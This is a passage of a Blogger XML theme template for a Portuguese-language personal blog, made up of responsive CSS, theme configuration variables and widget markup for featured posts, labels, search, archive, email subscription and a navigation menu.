    height: 65px!important;
    width: 48px;
    top: 0;
    left: 0;
    font-family: FontAwesome;
    color: #000;
    font-size: 17px;
    font-weight: 400;
    cursor: pointer;
    z-index: 4;
    padding: 0;
}
.com-mix{
padding: 0 0px;
}
#counter-section ul{
    display: grid;
    grid-template-columns: repeat(2,1fr);
    grid-gap: 20px;
}

#featured-wrapper .FeaturedPost .post-info {
left:0px;
}
.grid-posts {
    display: grid;
    grid-template-columns: repeat(2,1fr);
}

.top-bar-social {
display:none;
}

#top-bar,#top-bar .container {
height: 65px;
padding: 0px 10px;
}
.top-bar-social.social.mobile-social {
    display: none;
    position: relative;
    float: right;
}
.top-bar-social.social.mobile-social ul > li > a {
    height: 50px;
    line-height: 50px;
    color: #fff!important;;
    font-size: 14px;
}

     .footer-widgets-wrap{
         display:block 
    }
     #footer-wrapper .footer{
         width:100%;
         margin-right:0 
    }
     #footer-sec2,#footer-sec3{
         margin-top:25px 
    }

.header-menu{
height:65px;
position:relative;
}

.hot-posts .post-title{
font-size:18px;
}
}
 @media screen and (max-width: 680px) {

ul.hot-posts {
    display: grid;
    grid-template-columns: repeat(1,1fr);
}


#featured-wrapper .FeaturedPost .post-info {
    left: unset;
    width: 100%;
}
.hot-posts .post-info{
    padding: 10px;
}
#top-bar {
}
.grid-posts {
    display: grid;
    grid-template-columns: repeat(1,1fr);
}
.top-bar-nav {
    position: relative;
    width: 100%;
    text-align: center;
    float: left;
}
.top-bar-nav ul li {
    float: none;
    display: inline-block;
}
.top-bar-nav ul li > a, .top-bar-nav ul li:first-child>a {
    margin: 0;
    padding: 0 10px;
    height: 40px;
    line-height: 40px;
}
.header-logo {
    max-width: 100%;
}
.top-bar-social.social.mobile-social ul {
    padding: 0;
    margin: 0;
}
     #hot-section .show-hot .widget-content,#hot-section .hot-posts{
         height:auto 
    }
     #hot-section .hot-loader{
         height:200px 
    }
     .hot-posts .hot-item{
         width:100%;
         
         margin:10px 0 0 
    }
     .hot-posts .hot-item.item-0{
         width:100%;
         
         margin:0 
    }
     
     .hot-posts .post-title{
         font-size:18px 
    }
     .index-post{
         width:100% 
    }
}
 @media screen and (max-width: 560px) {


     #sub-footer-wrapper .copyright-area {
         font-size: 12px;
         display: inline-block;
         height: 34px;
         line-height: 34px;
         text-align: center;
         text-transform: uppercase;
         font-weight: 400;
         width: 100%;
    }

#counter-section ul{
    display: grid;
    grid-template-columns: repeat(1,1fr);
    grid-gap: 20px;
}


.index-post .post-title a{
font-size: 21px;
}
.header-logo{
}
     .lower-menu {
         text-align: center;
         height: 34px;
         line-height: 34px;
         display: block;
         float: none;
    }
     .mobile-menu .top-bar-nav {
         display:block;
    }
     .hot-posts .hot-item{
         width:100%;
         
    }
     .index-post .post-image-wrap{
         width:100%;
         float:none;
         margin:0 0 15px 
    }
     ul.related-posts{
         margin:0 
    }
     .related-posts .related-item{
         width:100%;
         padding:0;
         margin:20px 0 0 
    }
     .related-posts .item-0{
         margin:0 
    }
     .related-posts .post-tag{
         display:none 
    }
     .related-posts .post-image-link{
         width:80px;
         height:70px;
         float:left;
         margin:0 12px 0 0 
    }
     .related-posts .post-title{
         font-size:13px;
         overflow:hidden;
         margin:0 0 5px 
    }
     .post-reactions{
         display:none 
    }
}
 @media screen and (max-width: 440px) {
     .hot-posts .hot-item.item-0{
         
    }
     
.hot-posts .item-1 .post-title{
         font-size:16px;
}
.hot-posts .item-2 .post-title{
         font-size:16px;
}
     .queryMessage{
         text-align:center 
    }
     .queryMessage a.show-more{
         width:100%;
         margin:10px 0 0 
    }
     .item-post h1.post-title{
         font-size:24px 
    }
     .about-author{
         text-align:center 
    }
     .about-author .avatar-container{
         float:none;
         display:table;
         margin:0 auto 10px 
    }
     #comments ol{
         padding:0 
    }
     .errorWrap{
         padding:70px 0 100px 
    }
     .errorWrap h3{
         font-size:120px 
    }
}
 @media screen and (max-width: 360px) {
     .about-author .avatar-container{
         width:60px;
         height:60px 
    }
}

 @media screen and (max-width: 320px) {
.mobile-menu {
    width: 100%;
}
}


]]></b:skin>
<style>
/*-------Typography and ShortCodes-------*/
.firstcharacter{float:left;color:#27ae60;font-size:75px;line-height:60px;padding-top:4px;padding-right:8px;padding-left:3px}.post-body h1,.post-body h2,.post-body h3,.post-body h4,.post-body h5,.post-body h6{margin-bottom:15px;color:#2c3e50}blockquote{font-style:italic;color:#888;border: 1px solid #27ae60;border-radius: 3px;background: rgba(1, 255, 36, 0.058823529411764705);
margin-left: 0;margin-left:0;padding:10px 15px}blockquote:before{content:&#39;\f10d&#39;;display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;margin-right:10px;color:#888}blockquote:after{content:&#39;\f10e&#39;;display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;margin-left:10px;color:#888}.button{background-color:#2c3e50;float:left;padding:5px 12px;margin:5px;color:#fff;text-align:center;border:0;cursor:pointer;border-radius:3px;display:block;text-decoration:none;font-weight:400;transition:all .3s ease-out !important;-webkit-transition:all .3s ease-out !important}a.button{color:#fff}.button:hover{background-color:#27ae60;color:#fff}.button.small{font-size:12px;padding:5px 12px}.button.medium{font-size:16px;padding:6px 15px}.button.large{font-size:18px;padding:8px 18px}.small-button{width:100%;overflow:hidden;clear:both}.medium-button{width:100%;overflow:hidden;clear:both}.large-button{width:100%;overflow:hidden;clear:both}.demo:before{content:&quot;\f06e&quot;;margin-right:5px;display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:normal;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.download:before{content:&quot;\f019&quot;;margin-right:5px;display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:normal;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.buy:before{content:&quot;\f09d&quot;;margin-right:5px;display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:normal;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.visit:before{content:&quot;\f14c&quot;;margin-right:5px;display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:normal;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.widget .post-body ul,.widget .post-body ol{line-height:1.5;font-weight:400}.widget .post-body li{margin:5px 0;padding:0;line-height:1.5}.post-body ul li:before{content:&quot;\f105&quot;;margin-right:5px;font-family:fontawesome}pre{font-family:Monaco, &quot;Andale Mono&quot;, &quot;Courier New&quot;, Courier, monospace;background-color:#2c3e50;background-image:-webkit-linear-gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);background-image:-moz-linear-gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);background-image:-ms-linear-gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);background-image:-o-linear-gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);background-image:linear-gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);-webkit-background-size:100% 50px;-moz-background-size:100% 50px;background-size:100% 50px;line-height:25px;color:#f1f1f1;position:relative;padding:0 7px;margin:15px 0 10px;overflow:hidden;word-wrap:normal;white-space:pre;position:relative}pre:before{content:&#39;Code&#39;;display:block;background:#F7F7F7;margin-left:-7px;margin-right:-7px;color:#2c3e50;padding-left:7px;font-weight:400;font-size:14px}pre code,pre .line-number{display:block}pre .line-number a{color:#27ae60;opacity:0.6}pre .line-number span{display:block;float:left;clear:both;width:20px;text-align:center;margin-left:-7px;margin-right:7px}pre .line-number span:nth-child(odd){background-color:rgba(0, 0, 0, 0.11)}pre .line-number span:nth-child(even){background-color:rgba(255, 255, 255, 0.05)}pre .cl{display:block;clear:both}#contact{background-color:#fff;margin:30px 0 !important}#contact .contact-form-widget{max-width:100% !important}#contact .contact-form-name,#contact .contact-form-email,#contact .contact-form-email-message{background-color:#FFF;border:1px solid #eee;border-radius:3px;padding:10px;margin-bottom:10px !important;max-width:100% !important}#contact .contact-form-name{width:47.7%;height:50px}#contact .contact-form-email{width:49.7%;height:50px}#contact .contact-form-email-message{height:150px}#contact .contact-form-button-submit{max-width:100%;width:100%;z-index:0;margin:4px 0 0;padding:10px !important;text-align:center;cursor:pointer;background:#27ae60;border:0;height:auto;-webkit-border-radius:2px;-moz-border-radius:2px;-ms-border-radius:2px;-o-border-radius:2px;border-radius:2px;text-transform:uppercase;-webkit-transition:all .2s ease-out;-moz-transition:all .2s ease-out;-o-transition:all .2s ease-out;-ms-transition:all .2s ease-out;transition:all .2s ease-out;color:#FFF}#contact .contact-form-button-submit:hover{background:#2c3e50}#contact .contact-form-email:focus,#contact .contact-form-name:focus,#contact .contact-form-email-message:focus{box-shadow:none !important}.alert-message{position:relative;display:block;background-color:#FAFAFA;padding:20px;margin:20px 0;-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;color:#2f3239;border:1px solid}.alert-message p{margin:0 !important;padding:0;line-height:22px;font-size:13px;color:#2f3239}.alert-message span{font-size:14px !important}.alert-message i{font-size:16px;line-height:20px}.alert-message.success{background-color:#f1f9f7;border-color:#e0f1e9;color:#1d9d74}.alert-message.success a,.alert-message.success span{color:#1d9d74}.alert-message.alert{background-color:#DAEFFF;border-color:#8ED2FF;color:#378FFF}.alert-message.alert a,.alert-message.alert span{color:#378FFF}.alert-message.warning{background-color:#fcf8e3;border-color:#faebcc;color:#8a6d3b}.alert-message.warning a,.alert-message.warning span{color:#8a6d3b}.alert-message.error{background-color:#FFD7D2;border-color:#FF9494;color:#F55D5D}.alert-message.error a,.alert-message.error span{color:#F55D5D}.fa-check-circle:before{content:&quot;\f058&quot;}.fa-info-circle:before{content:&quot;\f05a&quot;}.fa-exclamation-triangle:before{content:&quot;\f071&quot;}.fa-exclamation-circle:before{content:&quot;\f06a&quot;}.post-table table{border-collapse:collapse;width:100%}.post-table th{background-color:#eee;font-weight:bold}.post-table th,.post-table td{border:0.125em solid #333;line-height:1.5;padding:0.75em;text-align:left}@media (max-width: 30em){.post-table thead tr{position:absolute;top:-9999em;left:-9999em}.post-table tr{border:0.125em solid #333;border-bottom:0}.post-table tr + tr{margin-top:1.5em}.post-table tr,.post-table td{display:block}.post-table td{border:none;border-bottom:0.125em solid #333;padding-left:50%}.post-table td:before{content:attr(data-label);display:inline-block;font-weight:bold;line-height:1.5;margin-left:-100%;width:100%}}@media (max-width: 20em){.post-table td{padding-left:0.75em}.post-table td:before{display:block;margin-bottom:0.75em;margin-left:0}}
.FollowByEmail {
    clear: both;
}
.widget .post-body ol {
    padding: 0 0 0 30px;
}
.post-body ul li {
    list-style: none;
}
</style>
<b:if cond='data:view.isLayoutMode'>
<b:template-skin>
<![CDATA[
/*------Layout (No Edit)----------*/
body#layout #outer-wrapper,body#layout .row{
    width:auto;
    padding:0
}
 body#layout{
    width:800px;
    position:relative;
    padding:95px 5px 0;
    margin:0
}
 body#layout div.section{
    margin:0 5px 10px!important;
    padding:16px 16px 18px!important
}
 body#layout .section h4{
    font-size:14px;
    margin:0
}
 body#layout .layout-widget-description{
    display:none
}
 body#layout .theme-options,body#layout #main-menu .widget{
    display:block!important
}
 body#layout div.sora-panel{
    background-color:#d7d7d7!important;
    overflow:hidden!important;
    border-color:#bcbcbc
}
 body#layout .sora-panel .widget{
    float:left;
    width:49%;
    margin-right:2%
}
 body#layout .sora-panel #LinkList71{
    margin-right:0
}
 body#layout #top-bar{
    height:auto
}
 body#layout #top-bar .container{
    display:flex
}
 body#layout .top-bar-nav,body#layout .top-bar-social{
    width:94.5%
}
body#layout #slider-section .widget {
    display: block;
}
 body#layout #header-wrap{
    height:auto
}
body#layout #hot-wrapper{
margin:0px;
}
 body#layout .header-header{
    float:left;
    width:100%;
    height:auto;
    padding:0
}
 body#layout .header-header .container{
  
}
 body#layout .preloader {
display:none!important;
}
 body#layout div.header-logo{
    float:left;
    width:50%;
    height:auto;
    max-width:none;
    max-height:none
}
body#layout div.header-ads{
}
 body#layout .header-ads .widget-content{
    width:auto
}
 body#layout .header-ads .add_widget{
    padding:15px!important
}
 body#layout .mobile-header{
    display:block;
    float:right;
    width:33.33%;
    height:auto
}
 body#layout .mobile-menu{
    display:none
}
 body#layout .header-menu{
    float:left;
    width:50%;
    height:auto
}
 body#layout #main-menu{
    height:auto
}
 body#layout #hot-wrapper .widget{
    display:block
}
 body#layout #content-wrapper{
    margin:0
}
 body#layout #content-wrapper > .container{
    display:flex;
    margin:0
}
body#layout .com-mix {
padding:0px;
}
 body#layout #main-wrapper{
    width:66.66%;
    padding:0
}
 body#layout #sidebar-wrapper{
    width:33.33%;
    padding:0;
display:block;
}
 body#layout .sidebar .widget,body#layout .sidebar .widget-content{
    float:none;
    overflow:visible
}
 body#layout .footer-widgets-wrap{
    display:flex
}
 body#layout .footer-widgets-wrap div.footer{
    width:100%
}

/*------Layout (end)----------*/
]]></b:template-skin>
</b:if>

<!-- Global Variables -->
<script type='text/javascript'>
//<![CDATA[
// Global variables with content. "Available for Edit"
var monthFormat = ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"],
    noThumbnail = "https://4.bp.blogspot.com/-O3EpVMWcoKw/WxY6-6I4--I/AAAAAAAAB2s/KzC0FqUQtkMdw7VzT6oOR_8vbZO6EJc-ACK4BGAYYCw/w680/nth.png",
    postPerPage = 6,
    fixedSidebar = true,
    commentsSystem = "blogger",
    disqusShortname = "soratemplates";
//]]>
</script>

<b:defaultmarkups>
  <b:defaultmarkup type='Common'>
    <b:includable id='widget-title'>
      <b:if cond='data:defaultTitle or data:title'>
        <div class='widget-title'>
          <h3 class='title'>
            <data:title/>
          </h3>
        </div>
      </b:if>
    </b:includable> 
<b:includable id='translate'>
      <b:switch var='data:blog.locale.language'>
        <b:case value='en'/><b:include name='customLang'/>
        <b:default/><b:include name='customLang'/>
      </b:switch>
    </b:includable> 
   <b:includable id='customLang'>
    <b:switch var='data:message'>
        <b:case value='prevPost'/>
        <b:if cond='data:blog.locale.language == &quot;en&quot;'>Postagem anterior<b:else/><data:messages.newer/></b:if>
        <b:case value='nextPost'/>
        <b:if cond='data:blog.locale.language == &quot;en&quot;'>Próximo Post<b:else/><data:messages.older/></b:if>
        <b:case value='loadMorePosts'/>
        <b:if cond='data:blog.locale.language == &quot;en&quot;'>Carregue Mais<b:else/><data:messages.loadMorePosts/></b:if>
        <b:case value='noMorePosts'/>
        <b:if cond='data:blog.locale.language == &quot;en&quot;'>Isso é tudo<b:else/><data:messages.noResultsFound/></b:if>
    </b:switch>
</b:includable>   
  </b:defaultmarkup>
  <b:defaultmarkup type='PopularPosts'>
    <b:includable id='main' var='this'>
      <b:include name='widget-title'/>
      <div class='widget-content'>
        <b:loop values='data:posts' var='post'>
          <b:include data='post' name='postContent'/>
        </b:loop>
      </div>
    </b:includable>
    <b:includable id='postContent' var='post'>
      <div class='post'>
        <div class='post-content'>
          <a class='post-image-link' expr:href='data:post.url'>
            <b:if cond='data:post.featuredImage'>
              <img class='post-thumb' expr:alt='data:post.title' expr:src='resizeImage(data:post.featuredImage, 72, &quot;1:1&quot;)'/>
              <b:else/>
              <img class='post-thumb' expr:alt='data:post.title' src='https://4.bp.blogspot.com/-O3EpVMWcoKw/WxY6-6I4--I/AAAAAAAAB2s/KzC0FqUQtkMdw7VzT6oOR_8vbZO6EJc-ACK4BGAYYCw/w680/nth.png'/>
            </b:if>
            <span class='post-tag'><data:post.labels.last.name/></span>
          </a>
          <div class='post-info'>
            <h2 class='post-title'>
              <a expr:href='data:post.url'><data:post.title/></a>
            </h2>
            <div class='post-meta'>
              <span class='post-date published' expr:datetime='data:post.date.iso8601'><data:post.date/></span>
            </div>
          </div>
        </div>
      </div>
    </b:includable>
  </b:defaultmarkup>
  <b:defaultmarkup type='Header'>
    <b:includable id='main' var='this'>
      <div class='header-widget'>
        <b:include cond='data:imagePlacement in {&quot;REPLACE&quot;, &quot;BEFORE_DESCRIPTION&quot;}' name='image'/>
        <b:include cond='data:imagePlacement == &quot;BEHIND&quot;' name='title'/>
      </div>
    </b:includable>
    <b:includable id='image'>
      <a class='header-image-wrapper' expr:href='data:blog.homepageUrl'>
        <img expr:alt='data:blog.title.escaped' expr:data-height='data:height' expr:data-width='data:width' expr:src='data:image'/>
      </a>
    </b:includable>
  </b:defaultmarkup>
  <b:defaultmarkup type='FeaturedPost'>
    <b:includable id='main' var='this'>
      <b:include name='widget-title'/>
      <div class='widget-content'>
        <b:if cond='data:widget.sectionId == &quot;featured-section&quot;'>
            <b:loop values='data:posts' var='post'>
          <b:include data='post' name='featpostContent'/>
        </b:loop>
          <b:else/>
        <b:loop values='data:posts' var='post'>
          <b:include data='post' name='postContent'/>
        </b:loop>
        </b:if>
      </div>
    </b:includable>
    <b:includable id='featpostContent' var='post'>
       <div class='post'>
        <div class='post-content'>
          <a class='post-image-link' expr:href='data:post.url'>
            <b:if cond='data:post.featuredImage'>
              <img class='post-thumb' expr:alt='data:post.title' expr:src='resizeImage(data:post.featuredImage, 72, &quot;1:1&quot;)'/>
              <b:else/>
              <img class='post-thumb' expr:alt='data:post.title' src='https://4.bp.blogspot.com/-O3EpVMWcoKw/WxY6-6I4--I/AAAAAAAAB2s/KzC0FqUQtkMdw7VzT6oOR_8vbZO6EJc-ACK4BGAYYCw/w680/nth.png'/>
            </b:if>
             <span class='post-tags'><data:post.labels.last.name/></span>
          </a>
          <div class='post-info'>

            <h2 class='post-title'>
              <a expr:href='data:post.url'><data:post.title/></a>
            </h2>
            <p class='post-snippet'><b:eval expr='data:post.snippets.long snippet { length: 150 }'/></p>
                    
                <b:include data='post' name='postJumpLink'/>
            <div id='featured-social'>
            </div>
          </div>
          
        </div>
      </div>
    </b:includable>
    <b:includable id='postContent' var='post'>
      <div class='post'>
        <div class='post-content'>
          <a class='post-image-link' expr:href='data:post.url'>
            <b:if cond='data:post.featuredImage'>
              <img class='post-thumb' expr:alt='data:post.title' expr:src='resizeImage(data:post.featuredImage, 72, &quot;1:1&quot;)'/>
              <b:else/>
              <img class='post-thumb' expr:alt='data:post.title' src='https://4.bp.blogspot.com/-O3EpVMWcoKw/WxY6-6I4--I/AAAAAAAAB2s/KzC0FqUQtkMdw7VzT6oOR_8vbZO6EJc-ACK4BGAYYCw/w680/nth.png'/>
            </b:if>
            <span class='post-tag'><data:post.labels.last.name/></span>
          </a>
          <div class='post-info'>
            <h2 class='post-title'>
              <a expr:href='data:post.url'><data:post.title/></a>
            </h2>
            <div class='post-meta'>
              <span class='post-date published' expr:datetime='data:post.date.iso8601'><data:post.date/></span>
            </div>
          </div>
        </div>
      </div>
    </b:includable>
  </b:defaultmarkup>
  <b:defaultmarkup type='Label'>
    <b:includable id='main' var='this'>
      <b:include name='widget-title'/>
      <b:include name='content'/>
    </b:includable>
    <b:includable id='content'>
      <div class='widget-content'>
        <b:class expr:name='data:this.display + &quot;-label&quot;'/>
        <b:include cond='data:this.display == &quot;list&quot;' name='list'/>
        <b:include cond='data:this.display == &quot;cloud&quot;' name='list'/>
      </div>
    </b:includable>
    <b:includable id='list'>
      <ul>
        <b:loop values='data:labels' var='label'>
          <li>
            <a class='label-name' expr:href='data:label.url'>
              <data:label.name/>
              <b:if cond='data:this.showFreqNumbers'>
                <span class='label-count'><data:label.count/></span>
              </b:if>
            </a>
          </li>
        </b:loop>
      </ul>
    </b:includable>
  </b:defaultmarkup>
  <b:defaultmarkup type='FollowByEmail'>
    <b:includable id='main' var='this'>
      <b:include name='content'/>
    </b:includable>
    <b:includable id='content'>
      <div class='widget-content'>
        <b:if cond='data:defaultTitle or data:title'>
          <h3 class='title'>
            <data:title/>
          </h3>
        </b:if>
        <span class='before-text'><data:skin.vars.followByEmail/></span>
        <div class='follow-by-email-inner'>
          <form action='https://feedburner.google.com/fb/a/mailverify' expr:onsubmit='&quot;window.open(\&quot;https://feedburner.google.com/fb/a/mailverify?uri=&quot; + data:feedPath + &quot;\&quot;, \&quot;popupwindow\&quot;, \&quot;scrollbars=yes,width=550,height=520\&quot;); return true&quot;' method='post' target='popupwindow'>
            <input autocomplete='off' class='follow-by-email-address' expr:placeholder='data:messages.emailAddress' name='email' type='email'/>
            <input class='follow-by-email-submit' expr:value='data:messages.subscribe' type='submit'/>
            <input expr:value='data:feedPath' name='uri' type='hidden'/>
            <input name='loc' type='hidden' value='en_US'/>
          </form>
        </div>
      </div>
    </b:includable>
  </b:defaultmarkup>
  <b:defaultmarkup type='BlogSearch'>
    <b:includable id='main' var='this'>
      <b:include name='widget-title'/>
      <b:include name='content'/>
    </b:includable>
    <b:includable id='content'>
      <div class='widget-content' role='search'>
        <form class='search-form' expr:action='data:blog.searchUrl'>
          <b:attr cond='not data:view.isPreview' name='target' value='_top'/>
          <b:include name='urlParamsAsFormInput'/>
          <input autocomplete='off' class='search-input' expr:aria-label='data:messages.searchThisBlog' expr:placeholder='data:messages.searchThisBlog' expr:value='data:view.isSearch ? data:view.search.query.escaped : &quot;&quot;' name='q'/>
          <input class='search-action' expr:value='data:messages.search.escaped' type='submit'/>  
        </form>
      </div>
    </b:includable>
  </b:defaultmarkup>
  <b:defaultmarkup type='BlogArchive'>
    <b:includable id='main' var='this'>
      <b:include name='widget-title'/>
      <b:include name='content'/>
    </b:includable>
    <b:includable id='content'>
      <div class='widget-content'>
        <div id='ArchiveList'>
          <div expr:id='data:widget.instanceId + &quot;_ArchiveList&quot;'>
            <b:include cond='data:this.style in {&quot;FLAT&quot;, &quot;MENU&quot;, &quot;HIERARCHY&quot;}' name='flat'/>
          </div>
        </div>
      </div>
    </b:includable>
    <b:includable id='flat'>
      <ul class='flat'>
        <b:loop values='data:data' var='i'>
          <li class='archivedate'>
            <a expr:href='data:i.url'>
              <data:i.name/><span class='post-count'><data:i.post-count/></span>
            </a>
          </li>
        </b:loop>
      </ul>
    </b:includable>
  </b:defaultmarkup>
</b:defaultmarkups>

    <!-- Google Analytics -->
    <b:include data='blog' name='google-analytics'/>

</head>
  
  
  
  
  
<body expr:class='data:blog.pageType'>
  <b:class cond='data:view.isHomepage' name='home'/>
  <b:class cond='data:view.isPage' name='item'/>
  <b:class cond='data:view.isArchive' name='index'/>
  <b:class cond='data:view.isError' name='error404'/>

<!-- Theme Options -->
  <div class='theme-options' style='display:none'>
    <b:section class='sora-panel' id='sora-panel' maxwidgets='1' name='Theme Options' showaddelement='no'>
      <b:widget id='LinkList70' locked='true' title='Css Options (Boxed and Snippet)' type='LinkList' version='2' visible='true'>
        <b:widget-settings>
          <b:widget-setting name='shownum'>8</b:widget-setting>
          <b:widget-setting name='sorting'>NONE</b:widget-setting>
          <b:widget-setting name='text-0'>postSnippet</b:widget-setting>
          <b:widget-setting name='link-0'>false</b:widget-setting>
        </b:widget-settings>
        <b:includable id='main'>
          <b:include name='content'/>
        </b:includable>
        <b:includable id='content'>
          &lt;style type=&#39;text/css&#39;&gt;
          <b:loop values='data:links' var='link'>
            <b:if cond='data:link.name == &quot;boxedVersion&quot;'>
              <b:if cond='data:link.target == &quot;true&quot;'>
                #outer-wrapper{max-width:1200px}
                .row {
                  box-sizing: border-box;}
                #footer-wrapper .container{padding: 25px 15px}
                #sub-footer-wrapper .container{padding:15px 15px}
              </b:if>
            </b:if>
 <b:if cond='data:link.name == &quot;postSnippet&quot;'>
              <b:if cond='data:link.target == &quot;true&quot;'>
                .post-snippet {display: block;} a.read-more {
    display: inline-block;}
              </b:if>
            </b:if>
          </b:loop>
          &lt;/style&gt;
        </b:includable>
      </b:widget>
      <b:widget id='LinkList71' locked='true' title='Default Variables' type='LinkList' version='2' visible='true'>
        <b:widget-settings>
          <b:widget-setting name='shownum'>8</b:widget-setting>
          <b:widget-setting name='link-3'>6</b:widget-setting>
          <b:widget-setting name='sorting'>NONE</b:widget-setting>
          <b:widget-setting name='link-4'>6</b:widget-setting>
          <b:widget-setting name='text-1'>commentsSystem</b:widget-setting>
          <b:widget-setting name='link-1'>blogger</b:widget-setting>
          <b:widget-setting name='text-0'>disqusShortname</b:widget-setting>
          <b:widget-setting name='link-2'>false</b:widget-setting>
          <b:widget-setting name='text-3'>postPerPage</b:widget-setting>
          <b:widget-setting name='link-0'>Rodrigoamorinn</b:widget-setting>
          <b:widget-setting name='text-2'>fixedSidebar</b:widget-setting>
          <b:widget-setting name='text-4'>postPerPage</b:widget-setting>
        </b:widget-settings>
        <b:includable id='main'>
          <b:include name='content'/>
        </b:includable>
        <b:includable id='content'>
          &lt;script type=&#39;text/javascript&#39;&gt;
          //&lt;![CDATA[
          <b:loop values='data:links' var='link'>
            <b:if cond='data:link.name == &quot;postPerPage&quot;'>
              var postPerPage = <data:link.target/>;
            </b:if>
            <b:if cond='data:link.name == &quot;fixedSidebar&quot;'>
              var fixedSidebar = <data:link.target/>;
            </b:if>
            <b:if cond='data:link.name == &quot;commentsSystem&quot;'>
              var commentsSystem = &quot;<data:link.target/>&quot;;
            </b:if>
            <b:if cond='data:link.name == &quot;disqusShortname&quot;'>
              var disqusShortname = &quot;<data:link.target/>&quot;;
            </b:if>
          </b:loop>
          //]]&gt;
          &lt;/script&gt;
        </b:includable>
      </b:widget>
    </b:section>
  </div>

<!-- Outer Wrapper -->
<div id='outer-wrapper'>
  
<!--Preloader Start-->
  <div class='preloader' style='display: block;'>
    <div class='sk-three-bounce'>
      <div class='sk-child sk-bounce1'/>
      <div class='sk-child sk-bounce2'/>
      <div class='sk-child sk-bounce3'/>
    </div>
  </div>
  <!--Preloader ENDS-->  
 
  

<!-- Main Top Bar -->
  
  <div id='combo-up'>
  
  <div id='top-bar'>
    <div class='container row'> 
        <b:section class='header-logo' id='header-logo' maxwidgets='1' name='Header Logo' showaddelement='yes'>
           <b:widget id='Header1' locked='true' title='@Rodrigoamorinn (Cabeçalho)' type='Header' version='2' visible='true'>
             <b:widget-settings>
               <b:widget-setting name='displayUrl'/>
               <b:widget-setting name='displayHeight'>0</b:widget-setting>
               <b:widget-setting name='sectionWidth'>412</b:widget-setting>
               <b:widget-setting name='useImage'>false</b:widget-setting>
               <b:widget-setting name='shrinkToFit'>false</b:widget-setting>
               <b:widget-setting name='imagePlacement'>BEHIND</b:widget-setting>
               <b:widget-setting name='displayWidth'>0</b:widget-setting>
             </b:widget-settings>
             <b:includable id='main' var='this'>
      <div class='header-widget'>
        <b:include cond='data:imagePlacement in {&quot;REPLACE&quot;, &quot;BEFORE_DESCRIPTION&quot;}' name='image'/>
        <b:include cond='data:imagePlacement == &quot;BEHIND&quot;' name='title'/>
      </div>
    </b:includable>
             <b:includable id='behindImageStyle'>
    <b:if cond='data:sourceUrl'>
      <b:include cond='data:this.image' data='{                    image: data:this.image,                    selector: &quot;.header-widget&quot;                  }' name='responsiveImageStyle'/>
      <style type='text/css'>
        .header-widget {
          background-position: <data:blog.locale.languageAlignment/>;
          background-repeat: no-repeat;
        }
      </style>
    </b:if>
  </b:includable>
             <b:includable id='description'>
    <p>
      <data:this.description/>
    </p>
  </b:includable>
             <b:includable id='image'>
      <a class='header-image-wrapper' expr:href='data:blog.homepageUrl'>
        <img expr:alt='data:blog.title.escaped' expr:data-height='data:height' expr:data-width='data:width' expr:src='data:image'/>
      </a>
    </b:includable>
             <b:includable id='title'>
    <h1>
      <b:tag cond='data:view.url != data:blog.homepageUrl' expr:href='data:blog.homepageUrl' name='a'>
        <data:title/>
      </b:tag>
    </h1>
  </b:includable>
           </b:widget>
         </b:section> 
        <div class='header-menu'>
        <span class='slide-menu-toggle'/>
        <b:section class='main-menu' id='main-menu' maxwidgets='1' name='Main Menu' showaddelement='yes'>
          <b:widget id='LinkList74' locked='true' title='Link List' type='LinkList' version='2' visible='true'>
            <b:widget-settings>
              <b:widget-setting name='link-5'>https://controledeevs.blogspot.com/</b:widget-setting>
              <b:widget-setting name='link-3'><![CDATA[https://www.rodrigoamorinn.com/search/label/Projetos?&max-results=5]]></b:widget-setting>
              <b:widget-setting name='link-4'>https://spmsystem.blogspot.com/</b:widget-setting>
              <b:widget-setting name='text-1'>Aplicativos</b:widget-setting>
              <b:widget-setting name='text-0'>Inicio</b:widget-setting>
              <b:widget-setting name='text-3'>Projetos</b:widget-setting>
              <b:widget-setting name='text-2'> Racrabbit &#174;</b:widget-setting>
              <b:widget-setting name='text-5'>_Controle de EVS</b:widget-setting>
              <b:widget-setting name='text-4'>_SPMSystems</b:widget-setting>
              <b:widget-setting name='sorting'>NONE</b:widget-setting>
              <b:widget-setting name='link-1'>http://apps.rodrigoamorinn.com/</b:widget-setting>
              <b:widget-setting name='link-2'>https://www.racrabbit.com</b:widget-setting>
              <b:widget-setting name='link-0'>https://www.rodrigoamorinn.com/</b:widget-setting>
            </b:widget-settings>
            <b:includable id='main'>
              <b:include name='content'/>
            </b:includable>
            <b:includable id='content'>
              <ul id='main-menu-nav' role='menubar'>
                <b:loop values='data:links' var='link'>
                  <li><a expr:href='data:link.target' role='menuitem'><data:link.name/></a></li>
                </b:loop>
              </ul>
            </b:includable>
          </b:widget>
        </b:section>
       <div id='nav-search'>
        <form action='/search' id='hbz-searchbox' method='get'>
    <input id='hbz-input' name='q' placeholder='Search...' type='text'/>
    <input name='max-results' type='hidden' value='8'/>
    <button id='hbz-submit' type='submit'>Search</button>
</form>
        </div>
        <span class='show-search'/>
        <div class='top-bar-social social mobile-social'/>
    </div>   
    </div>
  </div> 
  
<div class='clearfix'/>
<b:if cond='data:view.isHomepage'>
    <!-- Featured Wrapper -->
   <div id='featured-wrapper'>
   <div class='container'>  
      <b:section id='featured-section' maxwidgets='1' name='Featured Widget' showaddelement='yes'>
          <b:widget id='FeaturedPost1' locked='false' title='Featured Post' type='FeaturedPost' version='2' visible='true'>
            <b:widget-settings>
